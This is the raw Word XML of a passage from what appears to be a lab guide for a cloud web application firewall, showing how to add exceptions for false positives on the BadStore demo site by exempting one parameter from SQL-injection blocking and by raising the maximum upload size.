        <w:t xml:space="preserve">turn </w:t>
      </w:r>
      <w:r w:rsidR="00AA743A">
        <w:rPr/>
        <w:t>off</w:t>
      </w:r>
      <w:r w:rsidR="00AA743A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> SQL</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve"> Injection patterns from being blocked </w:t>
      </w:r>
      <w:r w:rsidR="22C78DBF">
        <w:rPr/>
        <w:t>in this part of the application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="50C40F79" w:rsidRDefault="003B48A4" w14:paraId="42E4AD04" w14:textId="39CD6B3F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">But we </w:t>
      </w:r>
      <w:r w:rsidR="49E3B13E">
        <w:rPr/>
        <w:t xml:space="preserve">must not </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">turn </w:t>
      </w:r>
      <w:r w:rsidR="7ADD0A16">
        <w:rPr/>
        <w:t xml:space="preserve">off </w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">SQL Injection protection for the </w:t>
      </w:r>
      <w:r w:rsidR="3337FCC0">
        <w:rPr/>
        <w:t>entire site</w:t>
      </w:r>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="50C40F79" w:rsidRDefault="003B48A4" w14:paraId="5B1322E3" w14:textId="647E7673">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="003B48A4">
        <w:rPr/>
        <w:t>Add the App Profiles component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="003B48A4" w:rsidRDefault="00163BC3" w14:paraId="338D65E6" w14:textId="5CDC63C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">Click Add </w:t>
      </w:r>
      <w:r w:rsidR="653A5B93">
        <w:rPr/>
        <w:t>URL and</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve"> add the URL from the firewall log: /cgi-bin/badstore.cgi  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B48A4" w:rsidP="699639B3" w:rsidRDefault="00163BC3" w14:paraId="0330051A" w14:textId="2D5DB61B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>You can leave all the settings at their defaults.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="00163BC3" w14:paraId="597BD3DA" w14:textId="59416DEE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>Hover over the “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>badstore.cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t xml:space="preserve">” profile, and click the “Add Parameter” icon </w:t>
      </w:r>
      <w:r w:rsidR="3A996FDB">
        <w:rPr/>
        <w:t>which l</w:t>
      </w:r>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>ooks like a plus with</w:t>
      </w:r>
      <w:r w:rsidR="6A9851C5">
        <w:rPr/>
        <w:t xml:space="preserve"> a gear</w:t>
      </w:r>
      <w:r w:rsidR="00AA743A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="005A2598" w:rsidRDefault="16C9B2F1" w14:paraId="0670459F" w14:textId="117F8DA6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidR="16C9B2F1">
        <w:drawing>
          <wp:inline wp14:editId="3BBDD16E" wp14:anchorId="0EEFCEBE">
            <wp:extent cx="2908300" cy="1381443"/>
            <wp:effectExtent l="0" t="0" r="6350" b="9525"/>
            <wp:docPr id="347451931" name="Picture 347451931" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 347451931"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R5a5cc1a3dbd742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08300" cy="1381443"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="006325FD" w:rsidRDefault="00163BC3" w14:paraId="69B7005E" w14:textId="1AA8E95C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00163BC3">
        <w:rPr/>
        <w:t>Enter the parameter which was blocked in the firewall log for the parameter name: comments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="006325FD" w:rsidRDefault="00163BC3" w14:paraId="0C9146E0" w14:textId="77DEA139">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="4100063F">
        <w:rPr/>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="21E3A6DB">
        <w:rPr/>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t>Parameter Class, select Custom</w:t>
      </w:r>
      <w:r w:rsidR="4A1917D6">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004C5DB5">
        <w:rPr/>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> uncheck “Block SQL </w:t>
      </w:r>
      <w:r w:rsidR="004C5DB5">
        <w:rPr/>
        <w:t xml:space="preserve">Injection” </w:t>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="40AF8625">
        <w:drawing>
          <wp:inline wp14:editId="02D4799F" wp14:anchorId="77AA75F9">
            <wp:extent cx="2755900" cy="2374666"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6985"/>
            <wp:docPr id="57603019" name="Picture 57603019" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 57603019"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R1d8d4b74806448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5900" cy="2374666"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="38DD7BB8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00163BC3" w:rsidP="699639B3" w:rsidRDefault="38DD7BB8" w14:paraId="58A71415" w14:textId="1E91489B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="59C4101A" w:rsidR="03E60FA1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Add </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265211" w:rsidP="50C40F79" w:rsidRDefault="00D450FF" w14:paraId="53F6CF55" w14:textId="62243E76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="474FD0CC">
        <w:rPr/>
        <w:t>Go to the comment field and try to add the same comment as before, verify you now can add the comment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265211" w:rsidP="50C40F79" w:rsidRDefault="00D450FF" w14:paraId="5F95265F" w14:textId="6C57D428">
      <w:pPr/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00265211" w:rsidP="50C40F79" w:rsidRDefault="00D450FF" w14:paraId="6AB7E6FF" w14:textId="5BA9D5F3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeTint="FF" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6BE998EA">
        <w:rPr/>
        <w:t xml:space="preserve">Adding an Exception for a </w:t>
      </w:r>
      <w:r w:rsidR="00D450FF">
        <w:rPr/>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="0005619E">
        <w:rPr/>
        <w:t>alse Positive</w:t>
      </w:r>
      <w:r w:rsidR="00D450FF">
        <w:rPr/>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>File Uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001713D4" w:rsidRDefault="00FF500C" w14:paraId="6004CD25" w14:textId="5A7ADC24">
      <w:r w:rsidR="430E6CD2">
        <w:rPr/>
        <w:t>One of our</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> suppliers is having trouble uploading their price lists</w:t>
      </w:r>
      <w:r w:rsidR="7A2FB86E">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="26582AE1">
        <w:rPr/>
        <w:t>Sh</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">e is going to the “Supplier Login” section, entering </w:t>
      </w:r>
      <w:r w:rsidR="1D181119">
        <w:rPr/>
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> email </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t>big@spender.com ,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6E0FE968">
        <w:rPr/>
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve"> password “money”, and clicking Login.</w:t>
      </w:r>
      <w:r w:rsidR="20B7B257">
        <w:rPr/>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="16B731DE">
        <w:rPr/>
        <w:t xml:space="preserve">Our </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t xml:space="preserve"> supplier has made the price list for you to </w:t>
      </w:r>
      <w:r w:rsidR="250E3AA8">
        <w:rPr/>
        <w:t xml:space="preserve">use for </w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t>troubleshoot</w:t>
      </w:r>
      <w:r w:rsidR="24597F88">
        <w:rPr/>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t xml:space="preserve"> available at: </w:t>
      </w:r>
      <w:hyperlink r:id="R3d80b65bb1f54258">
        <w:r w:rsidRPr="50C40F79" w:rsidR="184C1F62">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="184C1F62">
        <w:rPr/>
        <w:t xml:space="preserve"> .  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="50C40F79" w:rsidRDefault="00AE2927" w14:paraId="486B1EE9" w14:textId="457F1693">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="385202E8">
        <w:rPr/>
        <w:t xml:space="preserve">Save the file </w:t>
      </w:r>
      <w:hyperlink r:id="R418c1a5a642246bf">
        <w:r w:rsidRPr="50C40F79" w:rsidR="385202E8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://s3.amazonaws.com/nmiron-sko20-labs/pricelist.dat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="385202E8">
        <w:rPr/>
        <w:t xml:space="preserve"> to your computer   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="3DB4835F" w:rsidRDefault="00AE2927" w14:paraId="5ABDE5FB" w14:textId="161D3936">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="385202E8">
        <w:rPr/>
        <w:t xml:space="preserve">In your web browser, go to your WAFaaS </w:t>
      </w:r>
      <w:r w:rsidR="385202E8">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="4928EC85">
        <w:rPr/>
        <w:t>NAME</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="50C40F79" w:rsidRDefault="00AE2927" w14:paraId="4AAC09A1" w14:textId="696A6601">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="385202E8">
        <w:rPr/>
        <w:t>Click on Supplier Login</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="50C40F79" w:rsidRDefault="00AE2927" w14:paraId="02B29CB2" w14:textId="720D2044">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="385202E8">
        <w:rPr/>
        <w:t>Enter for the email: big@spender.com and</w:t>
      </w:r>
      <w:r w:rsidR="385202E8">
        <w:rPr/>
        <w:t xml:space="preserve"> password: money</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="50C40F79" w:rsidRDefault="00AE2927" w14:paraId="29A0B10F" w14:textId="30AE623E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="2FF406C5">
        <w:rPr/>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00AE2927">
        <w:rPr/>
        <w:t>lick choose file, select t</w:t>
      </w:r>
      <w:r w:rsidR="76F6E819">
        <w:rPr/>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidR="00AE2927">
        <w:rPr/>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidR="5283F71B">
        <w:rPr/>
        <w:t xml:space="preserve"> you saved</w:t>
      </w:r>
      <w:r w:rsidR="00AE2927">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:rPr/>
        <w:t xml:space="preserve">enter a filename of “my-pricelist.doc”, and click Upload. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="687CA52E" w:rsidP="699639B3" w:rsidRDefault="4B8AB2B2" w14:paraId="3FAD9296" w14:textId="3ECAEB00">
      <w:r w:rsidR="4B8AB2B2">
        <w:drawing>
          <wp:inline wp14:editId="5793E103" wp14:anchorId="392AB527">
            <wp:extent cx="2080171" cy="1801078"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1569228050" name="Picture 1569228050" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1569228050"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R7c7f727466ae4f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0171" cy="1801078"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="4960FEF7">
        <w:drawing>
          <wp:inline wp14:editId="14FA5761" wp14:anchorId="433D0333">
            <wp:extent cx="2867025" cy="1699999"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="623780379" name="Picture 623780379" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 623780379"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R05509224671641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7025" cy="1699999"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0549F914" w:rsidP="50C40F79" w:rsidRDefault="0549F914" w14:paraId="716C5B28" w14:textId="1B2D0413">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="200" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:eastAsia="Symbol" w:cs="Symbol" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="0549F914">
        <w:rPr/>
        <w:t>Review the firewall log entry to see why it was blocked</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="778FF361" w14:paraId="0C2C79CB" w14:textId="1E9669BC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="00FF500C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parameter Protection</w:t>
      </w:r>
      <w:r w:rsidR="00FF500C">
        <w:t xml:space="preserve"> component</w:t>
      </w:r>
      <w:r w:rsidR="27371931">
        <w:t xml:space="preserve"> you previously </w:t>
      </w:r>
      <w:r w:rsidR="0A9720DC">
        <w:t>added.</w:t>
      </w:r>
      <w:r w:rsidR="27371931">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="003D9E00" w14:textId="6FD3ECB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Find the Max Upload File Size input and change it to 10240 (10MB).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00FF500C" w:rsidR="00FF500C" w:rsidP="00FF500C" w:rsidRDefault="00FF500C" w14:paraId="302D6800" w14:textId="66748993">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="27A2EE48" w:rsidP="699639B3" w:rsidRDefault="2CFD1F03" w14:paraId="4B841B27" w14:textId="2F47245E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="2CFD1F03">
        <w:rPr/>
        <w:t>Test again</w:t>
      </w:r>
      <w:r w:rsidR="7EB94527">
        <w:rPr/>
        <w:t xml:space="preserve"> and verify you are able to upload the File  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="27A2EE48" w:rsidP="3DB4835F" w:rsidRDefault="2CFD1F03" w14:paraId="3C65440D" w14:textId="4A309D39">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="2CFD1F03">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="44EEB6D4">
        <w:drawing>
          <wp:inline wp14:editId="23AB024A" wp14:anchorId="3673FD4D">
            <wp:extent cx="2213162" cy="756164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119255084" name="Picture 119255084" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 119255084"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rab41e9591dbf42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13162" cy="756164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="5E3B81E8" w14:textId="095BF033"/>
    <w:p w:rsidR="0045382E" w:rsidRDefault="0045382E" w14:paraId="48686316" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00CA04DC" w:rsidR="1A3BB3AD" w:rsidP="0045382E" w:rsidRDefault="00CA04DC" w14:paraId="2448FD7F" w14:textId="6BB98D23">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00CA04DC">
        <w:t>THE END</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidRPr="00CA04DC" w:rsidR="1A3BB3A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hy8M85sF9u9T4" id="bLBiEny8"/>
    <int:WordHash hashCode="kajDhAlKYMTjji" id="vyY3P5Wu"/>
    <int:WordHash hashCode="wCgj9rKdcuGrsF" id="KAI/7B2G"/>
    <int:WordHash hashCode="NQmjNebJV7gKRy" id="Iyf4dBL+"/>
  </int:Manifest>
  <int:Observations>
    <int:Content id="bLBiEny8">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="vyY3P5Wu">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="KAI/7B2G">
      <int:Rejection type="AugLoop_Text_Critique"/>
    </int:Content>
    <int:Content id="Iyf4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193722"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="942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F9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE1E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69E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B418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FB2"/>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0B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13C6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70C7"/>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8DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="303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6A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="29BA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544F7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7170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D6EB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38D0D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F41808"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38DA7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541AC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="74F6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D30"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="70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43EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="13DAF5EA"/>
    <w:lvl w:ilvl="0">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A01BCD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90D48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5216C"/>
